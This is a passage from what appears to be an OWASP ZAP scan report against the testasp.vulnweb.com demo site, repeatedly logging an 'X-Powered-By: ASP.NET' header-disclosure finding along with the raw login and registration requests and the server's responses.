Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=34 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:10 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=34">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=35 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:10 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=35">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=36 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:10 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=36">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=37 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:10 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=37">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=38 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:12 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=38">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=39 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:12 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=39">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 459 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 218 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=4 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:02 GMT Content-Length: 141 |
| Response Body - size: 141 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=4">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=40 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:12 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=40">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 459 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 218 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=5 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:02 GMT Content-Length: 141 |
| Response Body - size: 141 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=5">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 459 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 218 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=6 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:02 GMT Content-Length: 141 |
| Response Body - size: 141 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=6">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 459 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 218 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=7 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:02 GMT Content-Length: 141 |
| Response Body - size: 141 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=7">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 459 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 218 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=8 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:03 GMT Content-Length: 141 |
| Response Body - size: 141 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=8">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 459 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 218 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=9 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:03 GMT Content-Length: 141 |
| Response Body - size: 141 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=9">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 499 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 234 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /Templatize.asp?item=html/about.html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:33 GMT Content-Length: 157 |
| Response Body - size: 157 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/Templatize.asp?item=html/about.html">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FDefault%2Easp%3F |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 447 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2FDefault%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2FDefault%2Easp%3F Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:24 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3F |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 445 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3F Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:33 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 473 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:48 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 463 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:34 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 463 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:42 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 463 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 HTTP/1.1
